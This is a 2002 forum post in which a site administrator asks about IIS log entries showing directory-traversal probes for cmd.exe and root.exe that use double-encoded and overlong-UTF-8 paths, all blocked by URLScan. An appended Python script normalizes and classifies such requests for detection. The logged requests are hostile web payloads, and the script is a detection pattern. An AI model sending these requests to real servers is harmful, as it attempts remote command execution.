Hello all and forgive my ignorance in this area.

We are in the process of bringing our website in house.  It was being hosted externally.
The site is almost up and I was just poking at the logs and was intrigued by what I saw.

Below is a snippet from the logs.  Can anyone tell by looking at it:

1.  What type of vulnerabilities were they looking for?
2.  Does the fact that it says <Rejected by urlscan> imply that URLScan from M$ is loaded?  I didn't do this myself...that's why I'm curious.
3.  What is the best course of action in regards to the individual attempting these activities?  I traced the IP back to RoadRunner.  Should I call their customer service and complain or am I just pissing in the wind?
4.  I did run the IIS Lockdown wizard.  Is that sufficient for most types of attacks?  What other tools should I consider running?

#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status cs(User-Agent)
2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 123 -
2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:05 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 123 -

Thanks so much for this great list.

Craig Brauckmiller
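
An added example, not part of the original post: a Python triage script that normalizes the requested URLs from log entries like those above (repeated percent-decoding, then folding two-byte sequences led by 0xC0/0xC1 the way a lax decoder would) and tags each entry by what the encoding was hiding. The tag names, the `fold`/`normalize`/`classify` helpers and the last sample line are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: entries from the post's log re-joined onto single lines,
# plus one made-up ordinary request (last line) for contrast.
SAMPLE_LOG = """\
2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:30:00 192.0.2.10 - 10.2.32.20 80 GET /default.htm - 200 0 -
"""

OVERLONG = re.compile(rb"[\xc0\xc1](.)", re.S)  # lead bytes never valid in UTF-8
SHELLS = {"cmd.exe", "root.exe"}                # binaries requested in the post's log

def fold(m):
    """Collapse a 2-byte sequence the way a lax decoder would (mask and shift)."""
    return bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(1)[0] & 0x3F)])

def normalize(uri):
    """Return (path, decode_passes, had_overlong) for a raw request URI."""
    raw, passes = uri.encode("latin-1"), 0
    while passes < 5:  # bounded: percent-decode until the value stops changing
        nxt = unquote_to_bytes(raw)
        if nxt == raw:
            break
        raw, passes = nxt, passes + 1
    folded = OVERLONG.sub(fold, raw)
    return folded.decode("latin-1").replace("\\", "/"), passes, folded != raw

def classify(line):
    """Tag one log line; field positions follow the #Fields header in the post."""
    f = line.split()
    stem, query = f[7], f[8]
    # In the post's log the requested URL sits in cs-uri-query after a '~'.
    uri = query[1:] if stem == "/<Rejected-By-UrlScan>" else stem
    path, passes, overlong = normalize(uri)
    checks = {
        "multi-encoded": passes > 1,
        "overlong-utf8": overlong,
        "traversal": ".." in path.split("/"),
        "shell-binary": path.rsplit("/", 1)[-1].lower() in SHELLS,
    }
    return {tag for tag, hit in checks.items() if hit}

if __name__ == "__main__":
    for entry in SAMPLE_LOG.splitlines():
        print(sorted(classify(entry)), entry.split()[8])
```

Every encoded variant in the sample normalizes to the same `/scripts/../../winnt/system32/cmd.exe` path, so matching on the normalized form catches variants that a literal string match on the raw URL would miss.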
